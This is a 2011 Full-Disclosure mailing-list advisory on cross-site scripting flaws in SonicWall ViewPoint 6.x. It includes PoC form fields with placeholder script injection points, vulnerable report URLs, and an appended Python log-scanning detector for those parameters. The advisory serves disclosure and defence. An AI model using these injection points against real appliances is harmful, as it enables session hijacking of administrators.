
List:       full-disclosure
Subject:    [Full-disclosure] Sonicwall Viewpoint v6.x - Multiple Web
From:       "research () vulnerability-lab ! com" <research () vulnerability-lab ! com>
Date:       2011-09-26 3:19:37
Message-ID: 4E7FEF49.7080905 () vulnerability-lab ! com

Title:
======
Sonicwall Viewpoint v6.x - Multiple Web Vulnerabilities


Date:
=====
2011-09-26


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=195


VL-ID:
=====
195


Introduction:
=============
SonicWALL® ViewPoint™ is a user-friendly, web-based reporting tool that fully supports and
extends SonicWALL's security products and services. It can be deployed flexibly as software
or as a virtual appliance. Comprehensive reporting functions give administrators immediate
insight into the state, performance and security of their network. With its customizable
overview display and a wide range of historical reports, SonicWALL ViewPoint helps
organizations of all sizes monitor network usage and security activity and view web usage.

(Copy of the Vendor Homepage: http://www.sonicwall.com/de/Centralized_Management_and_Reporting.html)


Abstract:
=========
The Vulnerability-Lab Team discovered multiple input validation vulnerabilities in SonicWall's
Viewpoint appliance/application.


Report-Timeline:
================
2011-05-16:	Vendor Notification
2011-06-21:	Vendor Response/Feedback
2011-**-**:	Vendor Fix/Patch
2011-09-26:	Public or Non-Public Disclosure


Status:
========
Published


Affected Products:
==================
Sonicwall Viewpoint v6.x & older versions


Exploitation-Technique:
=======================
Remote


Severity:
=========
Medium


Details:
========
1.1
Multiple persistent input validation vulnerabilities were detected in SonicWall's Viewpoint &
global management application. The persistent vulnerabilities allow a local low-privileged user
account to manipulate specific application modules or content requests.


Vulnerable Module(s): (Persistent)

					[+] SonicWall Training (Title; RSS_URL; Logs Mail)
					[+] Current Sessions (Title)
					[+] Add Component
					[+] Report Layout / Template
					[+] Scheduled Reports
					[+] Security Dashboard
					[+] Custom Report – Website Filtering
					[+] SonicWall Today
					[+] SonicToday Pagetitle
					[+] SonicToday log title


1.2
Multiple non-persistent input validation vulnerabilities were detected in SonicWall's Viewpoint &
global management application. The non-persistent vulnerabilities allow a remote attacker to
hijack customer/admin sessions, with a high level of required user interaction.

Vulnerable Module(s): (Non Persistent)	

					[+] FTP Usage / Top Users of FTP /  Web Usage Top Sites 
					[+] Show Logs
					[+] Description
					[+] Security Dashboard


Picture(s):
					../ive1.png
					../ive2.png
					../ive3.png


Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers or local low privileged user accounts.
For demonstration or to reproduce ...

Section: Top FTP Users
<input type=hidden name="reportType" value="singleday_report" />
<input type=hidden name="wrapped" value=">"<INSERT YOUR SCRIPTCODE HERE!>" />
<input type=hidden name="updatePerm" value="1" />
<input type=hidden name="node_id" value="UT1258498415223005056BA2A2D" />
<input type=hidden name="t" value="Reports_FTPUsage_ByUser_Snwls" />
<input type=hidden name="level" value="3" />
<input type=hidden name="r" value="60" />
<input type=hidden name="page" value="reports/topTenReport.jsp" />
<input type=hidden name="p" value="7640" />
<input type=hidden name="action" value="showPage" />
<input type=hidden name="report_id" value="180" />
<input type=hidden name="help_url" value="http://help.xxx.com/help.asp?l=<INSERT YOUR SCRIPTCODE HERE!>" />
<input type=hidden name="unused" value="1" />
<input type=hidden name="isTimeBasedReport" value="0" />
<input type="hidden" name="bidirection" value="0">


Section: License Viewpoint
<form method="post" action="login.jsp">
<input type="hidden" name="login" value="1"/>
<input type="hidden" name="url" value="/stats/pdf?sn=<INSERT YOUR SCRIPTCODE HERE!>
<input type="hidden" name="sn" value=">"<INSERT YOUR SCRIPTCODE HERE!>"/>
Username: <input type="text" name="userName"><br>
Password: <input type="password" name="password"><br>
<input type="submit" value="Login">
</form>

createDataBox(unescape(''),'','logs','2','284','5','5','Logs"><h1><INSERT SCRIPTCODE HERE!><"','DBC1269337065018005056BA2A2D','0','3','1','null'); <-- ;)

References: [x] <=
http://viewpoint.xxx.com/sgms/granular_report?action=view_report_action&template_id=100&config_id=7&config_name=facebook&node_id=UT1258498415223005056BA2A2D&successURL=
http://viewpoint.xxx.com/sgms/reportcontrol?action=showPage&page=reports/topTenReport.jsp&report_id=180&level=3&node_id=UT1258498415223005056BA2A2D&unused=1&updatePerm=1&help_url=http://help.xxx.com/help.asp?l=eng&t=Reports_FTPUsage_ByUser_Snwls&p=7640&r=60&wrapped=
http://viewpoint.xxx.com/sgms/reportcontrol?action=showPage&page=reports/loginReport.jsp&level=3&node_id=UT1258498415223005056BA2A2D&firewall_reports_id=4327&report_id=310&sortCol=%20Time%20&sortOrder=1&total_records=1287&chartType=null&displayType=[x]&record_offset=
http://viewpoint.xxx.com/sgms/reportcontrol?action=showPage&page=reports/logviewer/showlog2.jsp?serial_number=0017C51036B8&level=3&node_id=null&firewall_reports_id=0&report_id=null&sortCol=Dst%20Interface&sortOrder=0&total_records=397804&chartType=
http://lmdashboard.xxx.com/stats/pdf?sn=


Risk:
=====
The security risk of the persistent vulnerabilities is estimated as medium(+).
The security risk of the non-persistent vulnerabilities is estimated as low.


Credits:
========
Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty.
Vulnerability-Lab disclaims all warranties, either expressed or implied, including the
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or
its suppliers are not liable in any case of damage, including direct, indirect, incidental,
consequential loss of business profits or special damages, even if Vulnerability-Lab or its
suppliers have been advised of the possibility of such damages. Some states do not allow the
exclusion or limitation of liability for consequential or incidental damages so the foregoing
limitation may not apply. Any modified copy or reproduction, including partially usages, of
this file requires authorization from Vulnerability-Lab. Permission to electronically
redistribute this alert in its unmodified form is granted. All other rights, including the use
of other media, are reserved by Vulnerability-Lab or its suppliers.

    						Copyright © 2011|Vulnerability-Lab




-- 
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
Contact: admin@vulnerability-lab.com or support@vulnerability-lab.com


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
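
A detection sketch for the reflected parameters named in the advisory above, added here as an example and not part of the original advisory or of any vendor code: it scans web access logs for requests to the report endpoints whose watched parameters decode to HTML markup characters. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Paths and parameter names are the ones that appear in the advisory's PoC and URLs.
WATCHED_PATHS = {"/sgms/reportcontrol", "/sgms/granular_report", "/stats/pdf"}
WATCHED_PARAMS = {"wrapped", "help_url", "successURL", "displayType",
                  "record_offset", "chartType", "sn"}
MARKUP = re.compile(r'[<>"]')  # characters needed to break out of value="..."
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (combined log format assumed), not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [26/Sep/2011:10:00:01 +0000] "GET /sgms/reportcontrol?action=showPage'
    '&page=reports/topTenReport.jsp&help_url=http://help.xxx.com/help.asp?l=eng'
    '&r=60&wrapped= HTTP/1.1" 200 5120',
    '10.0.0.9 - - [26/Sep/2011:10:02:17 +0000] "GET /sgms/reportcontrol?action=showPage'
    '&page=reports/topTenReport.jsp&wrapped=%22%3E%3Cb%3Etest%3C%2Fb%3E HTTP/1.1" 200 5188',
    '10.0.0.9 - - [26/Sep/2011:10:03:40 +0000] "GET /stats/pdf?sn=%2522%253E%253Ci%253E'
    ' HTTP/1.1" 200 901',
]

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so %253C is still recognised as '<'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(log_line):
    """Return the sorted watched parameters whose decoded value contains markup."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if url.path not in WATCHED_PATHS:
        return []
    hits = {name for name, value in parse_qsl(url.query, keep_blank_values=True)
            if name in WATCHED_PARAMS and MARKUP.search(fully_decode(value))}
    return sorted(hits)

def scan(lines):
    """Map line index -> flagged parameter names, for lines with at least one hit."""
    return {i: hits for i, line in enumerate(lines) if (hits := suspicious_params(line))}

if __name__ == "__main__":
    for index, names in scan(SAMPLE_LOG).items():
        print(index, names)
```

Access logs normally record only the query string, so parameters submitted in a POST body (as in the login form shown in the advisory) need the same check applied at a proxy or in the application itself.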

